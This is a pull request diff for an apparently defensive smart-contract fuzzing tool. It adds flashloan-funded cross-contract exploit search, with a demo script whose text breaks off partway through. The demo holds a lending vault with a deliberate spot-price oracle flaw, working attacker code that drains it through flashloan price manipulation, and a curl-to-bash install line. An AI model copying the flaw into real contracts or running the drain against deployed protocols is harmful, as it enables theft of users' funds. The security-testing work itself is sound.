### PR TITLE
feat(dark-factory): cross-contract composability — flashloan-funded value extraction (FM2, #1041)

### DIFF
--- a/dark-factory/CHANGELOG.md
+++ b/dark-factory/CHANGELOG.md
@@ -16,6 +16,50 @@ Every release declares its runtime floor as `**Requires:** agentis >= X.Y.Z`.
 
 ### Added
 
+- **Cross-contract composability — the fuzzer now composes call-SEQUENCES across the target AND the protocols
+  it interacts with, so flashloan-funded cross-contract value extraction (the canonical oracle/price-
+  manipulation drain) is REACHABLE** (FM2, #1041). Single-contract invariant fuzzing is structurally blind to
+  it; this makes the highest-value bug class findable. Builds on FM1 fork mode. **Purely additive** — with no
+  `--fork-target` role beyond `target`, FM1/#1035/#1037 behaviour is byte-identical.
+  - `run-invariant-hunt.sh` / `run-autonomous-hunt.sh` — a **repeatable `--fork-target '<role>=<addr>'`** that
+    accepts a CONTEXT SET of deployed contracts beyond the single target (role ∈ {`target`, `dex`, `flashloan`,
+    `oracle`, …}). A bare `--fork-target <addr>` (no `=`) stays the FM1 one-target shorthand (role defaults to
+    `target`). Each address is validated as `0x` + 40 hex and each role against `[a-z0-9_]`; a role may not
+    repeat. The set is exported to the prover as `FORK_CONTEXT` — a **semicolon-separated `role=addr` list**
+    (e.g. `target=0x…;dex=0x…;flashloan=0x…`), parse-safe after validation. `run-autonomous-hunt.sh` forwards it
+    via `INV_FORK_CONTEXT` to the coordinator, which appends `--fork-context` to the gate the chosen
+    invariant-hunt runs (each value `shell_escape`d via `inv_opt_flag`).
+  - `evm-harness/forge-invariant.sh` — accepts and IGNORES a `--fork-context <role=addr;…>` flag (a
+    generation-prompt hint; the fuzzer auto-discovers its fuzz targets from the test's `targetContracts()`
+    view, so the gate needs nothing from the context) so a composability-mode caller can forward it uniformly
+    without an "unknown arg" error. No-fork / no-context behaviour is byte-identical.
+  - `auditor/agents/invariant-prover.ag` — when `FORK_CONTEXT` carries MORE than the `target` role the
+    generation prompt is extended: *"you may compose calls across these deployed contracts [role→address list];
+    model an attacker funded by a flashloan from `<flashloan>` (or `vm.deal` if none); move price via `<dex>`;
+    generate a Handler whose actions span all of them, and a deep invariant checking the TARGET's value/
+    solvency after the cross-contract sequence — NO free value extraction."* The `HANDLER_FIXTURE` path stays
+    authoritative; the `FORK_CONTEXT` addresses reach the prompt as plain text (never a shell). **Additive** —
+    a `FORK_CONTEXT` with only `target` (or empty) leaves the FM1 prompt byte-identical (composability fires
+    only on >1 role, counted via `regex_find_all("=", ctx)`).
+  - **NEW `demo-composability.sh`** — the proof, fully synthetic + offline (no RPC; it demonstrates the
+    mechanism the fork path then applies to real protocols). A `MiniAMM` (constant-product `x*y=k` whose `swap`
+    moves the spot price), a `LendingVault` that prices deposited collateral at the AMM **spot** price (the
+    manipulable-oracle bug) and lends quote against it, and a `FlashLender` (lend + require same-tx repayment).
+    Two configs run through `run-invariant-hunt.sh` over the same budget + seed: **(A) composable** —
+    `--fork-target target=<vault> --fork-target dex=<amm> --fork-target flashloan=<lender>` with a handler
+    spanning all three → **FINDING** (the fuzzer composes flashloan → swap to inflate the collateral spot price
+    → borrow against the overvalued collateral → swap back → repay → keep the surplus, breaking
+    `invariant_vault_not_drained`; the break is a REAL value extraction, not a hard-coded assert, with a shrunk
+    cross-contract witness); **(B) single-contract** — only the vault as target, a vault-only handler, same
+    budget/seed → **CLEAN** (the exploit is structurally unreachable without composing the DEX + flashloan; the
+    search still exercises the full budget — 256 runs × 64 depth — and holds). The A-FINDING / B-CLEAN split
+    proves composability is the lift. `[SKIP]`s + exits 0 without forge/agentis; temp dirs under `${TMPDIR}`,
+    trap-cleaned; a fixed `--seed` for reproducibility. The verdict is the FUZZER's exit code (no LLM — a
+    deterministic fixture). A FINDING is a LEAD a human triages — this colony never auto-submits.
+  - `README.md` / `docs/invariant-hunt.md` — a composability section (the `--fork-target <role>=<addr>` /
+    `FORK_CONTEXT` encoding, the flashloan-attacker model, that it composes with FM1 fork mode for real
+    targets, the human-gated boundary).
+
 - **Fork-state invariant hunting — the stateful hunter now fuzzes deep invariants against FORKED REAL
   ON-CHAIN STATE (the actual deployed contract at a pinned block), not only a fresh deploy** (FM1, #1041).
   Proven foundation: `forge` invariant-fuzzed 512 sequences against the REAL deployed WETH at mainnet block

--- a/dark-factory/README.md
+++ b/dark-factory/README.md
@@ -384,6 +384,8 @@ dark-factory/run-invariant-hunt.sh --repo "$PWD/target" --target Vault.sol:Vault
 # offline-deterministic end-to-end proof (real fuzzer, fixture handler):  dark-factory/demo-invariant-hunt.sh
 # FM1 (#1041) fork mode — fuzz against the REAL deployed contract at a pinned block (RPC is an arg; no key):
 #   --fork-url <http(s)-rpc> [--fork-block <n>] [--fork-target <deployed-addr>]   |   proof: dark-factory/demo-fork-hunt.sh
+# FM2 (#1041) composability — compose calls across a context set of deployed contracts (target + dex + flashloan):
+#   --fork-target target=<addr> --fork-target dex=<addr> --fork-target flashloan=<addr>   |   proof: dark-factory/demo-composability.sh
 ```
 
 **Fork mode (FM1, #1041).** `--fork-url <rpc> [--fork-block <n>]` runs the same handler + deep invariants
@@ -396,6 +398,22 @@ the pinned block makes a verdict reproducible. [`demo-fork-hunt.sh`](./demo-fork
 proof: it forks the REAL deployed WETH at mainnet block `25318855` via a public RPC and asserts the funded
 solvency invariant → `CLEAN` (the machinery ran against real forked state), plus a forced-bad RPC →
 `HARNESS_ERROR`. A `FINDING` against real forked state is a **LEAD a human triages** — this colony never posts.
+
+**Cross-contract composability (FM2, #1041).** Fork mode fuzzes the real target, but still as **one contract** —
+structurally blind to the highest-value class, **flashloan-funded cross-contract value extraction** (the
+canonical oracle/price-manipulation drain). FM2 lets the handler compose call-SEQUENCES across the target
+**and the protocols it interacts with**, via a **repeatable `--fork-target '<role>=<addr>'`** (role ∈
+{`target`, `dex`, `flashloan`, `oracle`, …}; a bare `--fork-target <addr>` stays the FM1 one-target shorthand).
+The role→address **context set** is exported to the prover as `FORK_CONTEXT` (a semicolon-separated `role=addr`
+list); the generation prompt then models a **flashloan-funded attacker** who moves price via the `dex` and
+checks the **target's** solvency after the cross-contract sequence (no free value extraction). **Purely
+additive**: with no role beyond `target`, FM1/#1035/#1037 behaviour is byte-identical. Composability ≠ fork —
+**they compose** (a real run pairs `--fork-url` with multiple `--fork-target` roles).
+[`demo-composability.sh`](./demo-composability.sh) is the proof: a synthetic `MiniAMM` + `LendingVault` +
+`FlashLender` system where the **composable** handler (target + dex + flashloan) finds the drain → `FINDING`
+with a shrunk cross-contract witness, while the **single-contract** (vault-only) handler over the same
+budget/seed → `CLEAN` — the split proving composability is the lift. A `FINDING` is a **LEAD a human triages** —
+this colony never posts.
 
 The verdict is the **fuzzer's exit code, never the LLM's opinion**: `FINDING` = an invariant broke under a
 concrete SHRUNK call-sequence (a CANDIDATE with a reproducible witness), `CLEAN` = every invariant held
@@ -565,6 +583,7 @@ dark-factory/
   demo-candidate-carry.sh       # Int M2 proof: TWO candidates carry their OWN target via candidate:<id>:* memos, flat env EMPTY -> SPLIT verdict (cand-0|confirmed, cand-1|refuted; SKIPs without forge)
   demo-pattern-memory.sh        # Int M3 proof: a FINDING persists invpat:latest:<class> to the DAG, a same-class target RECALLs + reuses it across runs, invent-method seeds a new class (SKIPs without forge)
   demo-fork-hunt.sh             # FM1 (#1041) foundation proof: forks the REAL deployed WETH at a pinned mainnet block -> funded-handler solvency invariant CLEAN against real forked state; forced-bad RPC -> HARNESS_ERROR (SKIPs without forge or a reachable public RPC)
+  demo-composability.sh         # FM2 (#1041) proof: synthetic MiniAMM+LendingVault+FlashLender; composable handler (target+dex+flashloan) -> FINDING with a cross-contract witness, single-contract handler same budget/seed -> CLEAN (the split proves composability is the lift; SKIPs without forge/agentis)
   setup-solana-toolchain.sh     # one-time offline toolchain build (network ON)
   snapshot-rpc.sh               # host RPC getAccountInfo -> frozen on-chain snapshot (V4)
   calibrate-sealevel.sh         # detection+validation scorecard over the sealevel corpus (V6)

--- a/dark-factory/auditor/agents/coordinator.ag
+++ b/dark-factory/auditor/agents/coordinator.ag
@@ -415,9 +415,14 @@ fn run_invariant_live(candId: string) -> string {
     // no-fork build (purely additive). A fork RPC failure is the gate's HARNESS_ERROR (2) -> dry, never a
     // false confirmed/refuted.
     let fork = inv_opt_flag("--fork-url", getenv("INV_FORK_URL")) + inv_opt_flag("--fork-block", getenv("INV_FORK_BLOCK"));
+    // FM2 (#1041): in COMPOSABILITY mode forward the role->address context set (INV_FORK_CONTEXT, a semicolon-
+    // separated `role=addr` list) to the gate as --fork-context (shell_escape()d via inv_opt_flag). Only the
+    // --pattern-store prover-gate wrapper consumes it (the prover's generation prompt); the bare forge gate
+    // ignores an unknown flag-shaped value it does not parse. Empty INV_FORK_CONTEXT => "" => byte-identical.
+    let forkCtx = inv_opt_flag("--fork-context", getenv("INV_FORK_CONTEXT"));
     // colony-lint: safe-exec-concat
     let runOut = exec sh "set +e; sh " + shell_escape(gate) + " --repo " + shell_escape(repo)
-               + " --target " + shell_escape(target) + " --match " + shell_escape(match) + budget + fork
+               + " --target " + shell_escape(target) + " --match " + shell_escape(match) + budget + fork + forkCtx
                + " 2>&1; echo __rc=$?";
     let rc = sym_rc_of(runOut);
     return sym_outcome_of(rc);

--- a/dark-factory/auditor/agents/invariant-prover.ag
+++ b/dark-factory/auditor/agents/invariant-prover.ag
@@ -112,6 +112,23 @@ fn fork_active(url: string, target: string) -> bool {
 }
 let forkMode = fork_active(forkUrl, forkTarget);
 
+// FM2 (#1041) — COMPOSABILITY MODE. FORK_CONTEXT is a semicolon-separated `role=addr` list (the context set
+// of deployed contracts the handler may compose calls ACROSS — target, dex, flashloan, oracle, ...). It is
+// UNTRUSTED operator input that flows ONLY into the LLM generation prompt (a plain string, never `exec sh`),
+// so the bare read needs no shell_escape. Composability fires only when the set carries MORE than the single
+// `target` role: a lone `target=...` (or an empty FORK_CONTEXT) leaves the FM1/single-target prompt
+// byte-identical. count_roles counts the `=` separators (one per `role=addr` pair) via regex_find_all;
+// >1 role => composability.
+let forkContext = getenv("FORK_CONTEXT");
+fn count_roles(ctx: string) -> int {
+    if len(ctx) == 0 { return 0; }
+    return len(regex_find_all("=", ctx));
+}
+fn composable_active(ctx: string) -> bool {
+    return count_roles(ctx) > 1;
+}
+let composableMode = composable_active(forkContext);
+
 // --- RECALL a prior winning invariant pattern (Int M3, #1037) ------------------------------------
 // Before GENERATE, recall the latest invariant pattern that produced a FINDING on THIS bug class from the
 // DAG pattern memory (the `invpat:latest:<class>` memo, mirroring recall-match.ag's recall_latest over the
@@ -174,10 +191,36 @@ fn fork_seed(active: bool, target: string, url: string, block: string) -> string
          + "handler), plus a deep invariant checked against the forked state — solvency, no-free-value-"
          + "extraction, or share-price monotonicity — that can only break under a SEQUENCE of calls.\n";
 }
-fn generate_test(klass: string, src: string, matchPrefix: string, prior: string, forkActive: bool, forkTarget: string, forkUrl: string, forkBlock: string) -> string {
+// FM2 (#1041) — COMPOSABILITY generation seed. When FORK_CONTEXT carries MORE than the single `target` role,
+// the handler may compose calls ACROSS the whole context set (a DEX/AMM for price moves, a flashloan source,
+// the oracle the target reads). The canonical highest-value bug a single-contract handler is structurally
+// blind to is FLASHLOAN-FUNDED CROSS-CONTRACT VALUE EXTRACTION (oracle/price manipulation): borrow a flashloan,
+// move the spot price on the DEX, interact with the TARGET at the mispriced state, swap back, repay — and walk
+// away with the target's reserves. The deep invariant checks the TARGET's value/solvency AFTER the whole
+// cross-contract sequence: an attacker who starts and ends with the SAME external position must NOT have
+// increased the target's debt to them / drained its reserves (NO free value extraction). The role->address set
+// (FORK_CONTEXT, a semicolon `role=addr` list) is untrusted operator input that flows only into this plain-
+// string prompt — never a shell. Empty / single-`target` context => "" so the prompt is byte-identical to FM1.
+fn compose_seed(active: bool, ctx: string) -> string {
+    if !active { return ""; }
+    return "COMPOSABILITY MODE: you may compose calls ACROSS these deployed contracts (role=address set): "
+         + ctx + ". Model an ATTACKER funded by a FLASHLOAN from the `flashloan` role (or `vm.deal` at Vm "
+         + "address 0x7109709ECfa91a80626fF3989D68f67F5b1DD12D when no flashloan role is given); MOVE the "
+         + "collateral/asset price via the `dex` role; then interact with the `target` role at the mispriced "
+         + "state. Generate a Handler whose action functions SPAN ALL of these contracts (e.g. flashAndSwap, "
+         + "borrowMax, swapBack, repay), and register EVERY one of them as a fuzz target via `targetContracts()` "
+         + "so the fuzzer can interleave them into a cross-contract SEQUENCE. The DEEP invariant must check the "
+         + "TARGET's value/solvency AFTER the cross-contract sequence: there is NO free value extraction — an "
+         + "attacker who starts and ends with the SAME external position must not have increased the target's "
+         + "debt to them or drained its reserves below the no-attack baseline. The exploit is the flashloan -> "
+         + "manipulate-price-on-dex -> extract-from-target -> restore -> repay SEQUENCE that single-contract "
+         + "fuzzing cannot reach.\n";
+}
+fn generate_test(klass: string, src: string, matchPrefix: string, prior: string, forkActive: bool, forkTarget: string, forkUrl: string, forkBlock: string, composeActive: bool, forkContext: string) -> string {
     let instruction =
         recall_seed(klass, prior)
       + fork_seed(forkActive, forkTarget, forkUrl, forkBlock)
+      + compose_seed(composeActive, forkContext)
       + "You are a stateful-invariant-fuzzing engineer. Write a self-contained Foundry stateful-invariant "
       + "test (Solidity, `pragma solidity ^0.8.20;`) for the target contract below so Foundry's invariant "
       + "fuzzer can drive randomized multi-call SEQUENCES through it and find a MULTI-STEP exploit. "
@@ -207,11 +250,11 @@ fn generate_test(klass: string, src: string, matchPrefix: string, prior: string,
 // Single-assignment .ag: pick the test source ONCE (no `let` reassignment). A non-empty HANDLER_FIXTURE wins
 // (offline/deterministic, verbatim, no LLM); otherwise the LLM generates it (live path).
 let usedFixture = len(fixture) > 0;
-fn choose_test(usedFix: bool, fix: string, klass: string, src: string, matchPrefix: string, prior: string, forkActive: bool, forkTarget: string, forkUrl: string, forkBlock: string) -> string {
+fn choose_test(usedFix: bool, fix: string, klass: string, src: string, matchPrefix: string, prior: string, forkActive: bool, forkTarget: string, forkUrl: string, forkBlock: string, composeActive: bool, forkContext: string) -> string {
     if usedFix { return fix; }
-    return generate_test(klass, src, matchPrefix, prior, forkActive, forkTarget, forkUrl, forkBlock);
+    return generate_test(klass, src, matchPrefix, prior, forkActive, forkTarget, forkUrl, forkBlock, composeActive, forkContext);
 }
-let test = choose_test(usedFixture, fixture, targetClass, code, invMatch, prior, forkMode, forkTarget, forkUrl, forkBlock);
+let test = choose_test(usedFixture, fixture, targetClass, code, invMatch, prior, forkMode, forkTarget, forkUrl, forkBlock, composableMode, forkContext);
 
 // Write the generated/fixture test to INV_OUT (inside INV_REPO/test) so forge-invariant can run it. The test
 // content is UNTRUSTED — it is either an LLM completion (prompt-injectable by the untrusted target code under

--- a/dark-factory/demo-composability.sh
+++ b/dark-factory/demo-composability.sh
@@ -1,0 +1,470 @@
+#!/usr/bin/env bash
+# demo-composability.sh — FM2 (#1041) PROOF: the stateful-invariant hunter now composes call-SEQUENCES ACROSS
+# the target AND the protocols it interacts with, so the highest-value bug class — FLASHLOAN-FUNDED
+# CROSS-CONTRACT VALUE EXTRACTION (the canonical oracle/price-manipulation exploit) — is REACHABLE. Single-
+# contract invariant fuzzing is structurally blind to it; this demo proves the lift.
+#
+# It is fully SYNTHETIC + OFFLINE (no RPC needed): it demonstrates the MECHANISM the fork path then applies to
+# real protocols. (Composability != fork: FM1 already proved fork against the real deployed WETH; FM2 proves
+# cross-contract composition. The two COMPOSE — a real run uses `--fork-url` + multiple `--fork-target` roles.)
+#
+# The synthetic system (three contracts, all deployed locally by the test):
+#   - MiniAMM      — a constant-product (x*y=k) AMM whose `swap` MOVES the spot price of the collateral token.
+#   - LendingVault — prices deposited collateral at the AMM's SPOT price (the manipulable-oracle bug) and lets a
+#                    user `borrow` quote tokens up to the spot-valued collateral; its quote reserves can drain.
+#   - FlashLender  — lends quote tokens and REQUIRES repayment in the SAME tx (a flashloan source).
+#
+# The exploit is a CROSS-CONTRACT SEQUENCE the fuzzer must compose:
+#   flashloan quote  ->  swap quote->collateral to INFLATE the collateral's spot price
+#                    ->  deposit a little collateral + BORROW against the now-overvalued collateral
+#                    ->  swap back  ->  repay the flashloan  ->  KEEP the surplus
+# The vault is left UNDER-COLLATERALISED / drained. The deep invariant `invariant_vault_not_drained` checks the
+# TARGET's solvency AFTER the whole sequence: NO actor may extract more quote than the real value they put in
+# (no free value extraction). The FINDING is a REAL cross-contract invariant break the fuzzer DISCOVERS and
+# shrinks — never a hard-coded assert.
+#
+# Two configs are run through `run-invariant-hunt.sh` over the SAME fuzz budget + seed:
+#   (A) COMPOSABLE      — --fork-target target=<vault> --fork-target dex=<amm> --fork-target flashloan=<lender>
+#                         with the CROSS-CONTRACT handler  ->  assert FINDING + the shrunk cross-contract witness.
+#   (B) SINGLE-CONTRACT — only the vault as target, a handler restricted to vault-only calls (deposit/borrow/
+#                         repay), same budget/seed  ->  assert CLEAN (the exploit is UNREACHABLE without
+#                         composing the DEX + flashloan).
+# The A-FINDING / B-CLEAN split PROVES composability is the lift. The verdict is always the FUZZER's exit code,
+# never the LLM's opinion (generation uses a deterministic HANDLER_FIXTURE — no LLM is called).
+#
+# CI has no forge/agentis, so if either is missing this prints a single [SKIP] line and exits 0 (mirroring
+# demo-invariant-hunt.sh / the colony-lint skip convention). Install the toolchain to run it for real:
+#   curl -L https://foundry.paradigm.xyz | bash && foundryup    # forge (has built-in invariant fuzzing)
+#
+# Usage:  dark-factory/demo-composability.sh
+# Exit: 0 = composable -> FINDING (with a non-empty cross-contract witness) AND single-contract -> CLEAN, or
+#       tools absent -> SKIP ; non-zero = a verdict was wrong (the split did not hold).
+set -uo pipefail
+
+HERE="$(cd "$(dirname "$0")" && pwd)"
+RUNNER="$HERE/run-invariant-hunt.sh"
+
+FAILS=0
+note() { echo "demo-composability.sh: $*"; }
+ok()   { echo "  [OK]   $*"; }
+bad()  { echo "  [FAIL] $*"; FAILS=$((FAILS + 1)); }
+skip() { echo "  [SKIP] $*"; }
+
+# Skip EARLY (before any work) when the toolchain is missing, so CI without forge reports a clean [SKIP] +
+# exit 0 rather than a harness error. agentis is required to drive the substrate loop.
+if ! command -v forge >/dev/null 2>&1; then
+  skip "forge not on PATH — install foundryup (https://getfoundry.sh) to run this composability demo"
+  exit 0
+fi
+if ! command -v agentis >/dev/null 2>&1; then
+  skip "agentis not on PATH — install the agentis runtime to drive the substrate invariant-hunt loop"
+  exit 0
+fi
+
+[ -x "$RUNNER" ] || { note "runner not found / not executable: $RUNNER" >&2; exit 3; }
+
+WORK="$(mktemp -d "${TMPDIR:-/tmp}/demo-composability.XXXXXX")"
+trap 'rm -rf "$WORK"' EXIT
+
+# A fixed seed for a reproducible search (both legs use it).
+SEED=1
+# A synthetic deployed-address set for the role labels (locally deployed by the test; these are just the
+# `--fork-target` role tags the prompt/encoding carry — the fixture handler deploys the real instances).
+VAULT_ADDR="0x00000000000000000000000000000000000000A1"
+AMM_ADDR="0x00000000000000000000000000000000000000B2"
+LENDER_ADDR="0x00000000000000000000000000000000000000C3"
+
+# ----------------------------------------------------------------------------------------------------------
+# Build the synthetic foundry project: the three-contract system that GENUINELY encodes the cross-contract
+# flashloan-oracle-manipulation exploit. forge-std-free.
+# ----------------------------------------------------------------------------------------------------------
+mkdir -p "$WORK/repo/src" "$WORK/repo/test"
+printf '[profile.default]\nsrc = "src"\nout = "out"\n\n[invariant]\nruns = 256\ndepth = 64\nfail_on_revert = false\n' > "$WORK/repo/foundry.toml"
+
+cat > "$WORK/repo/src/System.sol" <<'SOL'
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+
+// A minimal mint/transfer ERC20-ish token (no allowance ceremony — the handler is the only caller).
+contract Token {
+    mapping(address => uint256) public balanceOf;
+    uint256 public totalSupply;
+    function mint(address to, uint256 a) external { balanceOf[to] += a; totalSupply += a; }
+    function transfer(address to, uint256 a) external returns (bool) {
+        require(balanceOf[msg.sender] >= a, "bal");
+        balanceOf[msg.sender] -= a; balanceOf[to] += a; return true;
+    }
+    function transferFrom(address f, address t, uint256 a) external returns (bool) {
+        require(balanceOf[f] >= a, "bal");
+        balanceOf[f] -= a; balanceOf[t] += a; return true;
+    }
+}
+
+// Constant-product (x*y=k) AMM over (collateral, quote). swapQuoteForColl buys collateral with quote (pushes
+// the collateral spot price UP); swapCollForQuote is the reverse. spotPrice = quote-per-collateral (scaled
+// 1e18). This is the manipulable SPOT oracle the vault naively trusts.
+contract MiniAMM {
+    Token public coll; Token public quote;
+    uint256 public reserveColl; uint256 public reserveQuote;
+    constructor(Token _coll, Token _quote, uint256 rc, uint256 rq) {
+        coll = _coll; quote = _quote; reserveColl = rc; reserveQuote = rq;
+    }
+    // quote-per-collateral, 1e18-scaled. The vault prices collateral at this SPOT value (the bug).
+    function spotPrice() public view returns (uint256) {
+        if (reserveColl == 0) return 0;
+        return reserveQuote * 1e18 / reserveColl;
+    }
+    // Pay `quoteIn` quote, receive collateral out (x*y=k, no fee). Raises spotPrice (reserveQuote up, coll down).
+    function swapQuoteForColl(uint256 quoteIn) external returns (uint256 collOut) {
+        require(quote.transferFrom(msg.sender, address(this), quoteIn), "qin");
+        uint256 k = reserveColl * reserveQuote;
+        uint256 newQuote = reserveQuote + quoteIn;
+        uint256 newColl = k / newQuote;
+        collOut = reserveColl - newColl;
+        reserveColl = newColl; reserveQuote = newQuote;
+        require(coll.transfer(msg.sender, collOut), "qout");
+    }
+    // Pay `collIn` collateral, receive quote out. Lowers spotPrice (the swap-back leg).
+    function swapCollForQuote(uint256 collIn) external returns (uint256 quoteOut) {
+        require(coll.transferFrom(msg.sender, address(this), collIn), "cin");
+        uint256 k = reserveColl * reserveQuote;
+        uint256 newColl = reserveColl + collIn;
+        uint256 newQuote = k / newColl;
+        quoteOut = reserveQuote - newQuote;
+        reserveColl = newColl; reserveQuote = newQuote;
+        require(quote.transfer(msg.sender, quoteOut), "cout");
+    }
+}
+
+// Prices deposited collateral at the AMM's SPOT price and lends quote against it. The oracle is the
+// manipulable spot price -> an attacker who inflates the spot price can borrow far more quote than the
+// collateral is really worth, draining the vault's quote reserves. The vault is the TARGET.
+contract LendingVault {
+    Token public coll; Token public quote; MiniAMM public amm;
+    mapping(address => uint256) public collateral;   // collateral deposited per user
+    mapping(address => uint256) public debt;          // quote borrowed per user
+    constructor(Token _coll, Token _quote, MiniAMM _amm) { coll = _coll; quote = _quote; amm = _amm; }
+    function deposit(uint256 a) external {
+        require(coll.transferFrom(msg.sender, address(this), a), "din");
+        collateral[msg.sender] += a;
+    }
+    // Borrow quote up to the SPOT-valued collateral (collateral * spotPrice / 1e18) minus existing debt.
+    function borrow(uint256 a) external {
+        uint256 maxDebt = collateral[msg.sender] * amm.spotPrice() / 1e18;
+        require(debt[msg.sender] + a <= maxDebt, "ltv");
+        require(quote.balanceOf(address(this)) >= a, "liq");
+        debt[msg.sender] += a;
+        require(quote.transfer(msg.sender, a), "bout");
+    }
+    function repay(uint256 a) external {
+        if (a > debt[msg.sender]) a = debt[msg.sender];
+        require(quote.transferFrom(msg.sender, address(this), a), "rin");
+        debt[msg.sender] -= a;
+    }
+    function withdraw(uint256 a) external {
+        require(collateral[msg.sender] >= a, "col");
+        // Withdrawal keeps remaining collateral covering debt at the CURRENT spot price.
+        uint256 remain = collateral[msg.sender] - a;
+        require(debt[msg.sender] <= remain * amm.spotPrice() / 1e18, "ltv");
+        collateral[msg.sender] -= a;
+        require(coll.transfer(msg.sender, a), "wout");
+    }
+}
+
+// A flashloan source: lends `amount` quote to the borrower's onFlash callback, requires it back +0 fee in the
+// SAME tx (reverts otherwise). The cross-contract attacker is funded by this (no external capital).
+interface IFlashBorrower { function onFlash(uint256 amount) external; }
+contract FlashLender {
+    Token public quote;
+    constructor(Token _quote) { quote = _quote; }
+    function flash(uint256 amount) external {
+        uint256 pre = quote.balanceOf(address(this));
+        require(quote.transfer(msg.sender, amount), "lend");
+        IFlashBorrower(msg.sender).onFlash(amount);
+        require(quote.balanceOf(address(this)) >= pre, "repay");   // must be repaid in full, same tx
+    }
+}
+SOL
+
+# ----------------------------------------------------------------------------------------------------------
+# (A) The COMPOSABLE fixture: a Handler whose actions SPAN all three contracts (flashAndSwap, borrowMax,
+# swapBack, repay) and a deep invariant `invariant_vault_not_drained` checking the vault is not left short of
+# quote reserves vs. the no-attack baseline. The fuzzer composes a cross-contract SEQUENCE that breaks it.
+# forge-std-free: targets via targetContracts(); asserts via plain require().
+# ----------------------------------------------------------------------------------------------------------
+cat > "$WORK/composable.t.sol" <<'SOL'
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+import {Token, MiniAMM, LendingVault, FlashLender, IFlashBorrower} from "../src/System.sol";
+
+// The attacker as a real cross-contract caller. Its public functions are the building blocks of the exploit;
+// the fuzzer interleaves them into a SEQUENCE. The flashloan callback runs the inflate->deposit->borrow->
+// swap-back leg atomically; repay closes it. No external capital — everything is flashloan-funded.
+contract ComposingHandler is IFlashBorrower {
+    Token public coll; Token public quote; MiniAMM public amm; LendingVault public vault; FlashLender public lender;
+    uint256 public stolen;          // net quote the attacker has extracted and kept
+    uint256 public flashAmt;        // current in-flight flashloan size (for the callback)
+    constructor(Token _c, Token _q, MiniAMM _a, LendingVault _v, FlashLender _l) {
+        coll = _c; quote = _q; amm = _a; vault = _v; lender = _l;
+    }
+    function _bound(uint256 x, uint256 lo, uint256 hi) internal pure returns (uint256) {
+        if (hi <= lo) return lo; return lo + (x % (hi - lo + 1));
+    }
+    // Take a flashloan of quote; the lender calls onFlash() which runs the whole manipulate+borrow leg.
+    function flashAndSwap(uint256 amt) public {
+        flashAmt = _bound(amt, 1e18, 50_000e18);
+        if (quote.balanceOf(address(lender)) < flashAmt) return;
+        lender.flash(flashAmt);   // -> onFlash below, repaid by tx end
+    }
+    // The flashloan callback: inflate the collateral spot price with the borrowed quote, deposit a slice of
+    // collateral into the vault, borrow the now-overvalued quote, then swap back to free the quote to repay.
+    function onFlash(uint256 amount) external {
+        require(msg.sender == address(lender), "auth");
+        // 1) Buy collateral with most of the flashloan -> reserveQuote up, reserveColl down -> spotPrice UP.
+        uint256 spend = amount * 9 / 10;
+        quote.transfer(address(amm), 0);   // no-op transfer keeps ABI honest; real spend below via swap
+        uint256 gotColl = amm.swapQuoteForColl(spend);
+        // 2) Deposit a portion of the bought collateral and borrow against its inflated valuation.
+        uint256 dep = gotColl / 2;
+        if (dep > 0) {
+            vault.deposit(dep);
+            uint256 maxBorrow = vault.collateral(address(this)) * amm.spotPrice() / 1e18;
+            uint256 want = maxBorrow > vault.debt(address(this)) ? maxBorrow - vault.debt(address(this)) : 0;
+            uint256 avail = quote.balanceOf(address(vault));
+            if (want > avail) want = avail;
+            if (want > 0) vault.borrow(want);
+        }
+        // 3) Swap the remaining collateral back to quote to restore the pool & free quote to repay the flash.
+        uint256 cbal = coll.balanceOf(address(this));
+        if (cbal > 0) amm.swapCollForQuote(cbal);
+        // 4) Repay the flashloan in full (same tx). Whatever quote remains is the attacker's profit.
+        quote.transfer(address(lender), amount);
+        stolen = quote.balanceOf(address(this));
+    }
+    // A vault-only repay action (lets the fuzzer also explore unwinding; not required for the break).
+    function repaySome(uint256 a) public {
+        uint256 d = vault.debt(address(this));
+        if (d == 0) return;
+        a = _bound(a, 1, d);
+        if (quote.balanceOf(address(this)) < a) return;
+        vault.repay(a);
+    }
+}
+
+abstract contract InvBase {
+    address[] private _targets;
+    function targetContracts() public view returns (address[] memory) { return _targets; }
+    function _target(address a) internal { _targets.push(a); }
+}
+
+contract ComposableInvariantTest is InvBase {
+    Token coll; Token quote; MiniAMM amm; LendingVault vault; FlashLender lender; ComposingHandler h;
+    uint256 vaultQuoteBaseline;   // the vault's quote reserves with no attack (the solvency floor)
+    function setUp() public {
+        coll = new Token(); quote = new Token();
+        // Seed a deep, balanced AMM (spotPrice == 1e18 at start) so price moves are real but not degenerate.
+        coll.mint(address(this), 1_000_000e18); quote.mint(address(this), 1_000_000e18);
+        amm = new MiniAMM(coll, quote, 100_000e18, 100_000e18);
+        coll.transfer(address(amm), 100_000e18); quote.transfer(address(amm), 100_000e18);
+        vault = new LendingVault(coll, quote, amm);
+        // The vault holds quote reserves to lend; this is what a drain steals.
+        quote.mint(address(vault), 200_000e18);
+        vaultQuoteBaseline = quote.balanceOf(address(vault));
+        lender = new FlashLender(quote);
+        quote.mint(address(lender), 500_000e18);
+        h = new ComposingHandler(coll, quote, amm, vault, lender);
+        // Register EVERY building-block contract as a fuzz target so the fuzzer composes calls across them.
+        _target(address(h)); _target(address(amm)); _target(address(vault)); _target(address(lender));
+    }
+    // DEEP, CROSS-CONTRACT invariant: no actor may walk away with more quote than the real value it put in.
+    // The attacker starts with ZERO external capital (flashloan-funded), so ANY kept quote (`stolen`) is FREE
+    // value extracted from the vault — the oracle-manipulation drain. A break is the flashloan->inflate->
+    // borrow->swap-back->repay SEQUENCE the fuzzer composes across the three contracts.
+    function invariant_vault_not_drained() public view {
+        require(h.stolen() == 0, "vault drained: attacker extracted free value via cross-contract sequence");
+    }
+}
+SOL
+
+# ----------------------------------------------------------------------------------------------------------
+# (B) The SINGLE-CONTRACT fixture: the SAME vault as the only target, a handler restricted to VAULT-ONLY calls
+# (deposit / borrow / repay / withdraw) — NO AMM swap, NO flashloan. With honest external capital and no way to
+# move the oracle, the LTV check holds and nothing is extractable -> the same fuzzed search is CLEAN. This is
+# the structural blindness: without composing the DEX + flashloan, the exploit is UNREACHABLE.
+# ----------------------------------------------------------------------------------------------------------
+cat > "$WORK/single.t.sol" <<'SOL'
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+import {Token, MiniAMM, LendingVault, FlashLender} from "../src/System.sol";
+
+// A vault-only actor: it can ONLY deposit honestly-acquired collateral, borrow within LTV, and repay. It has
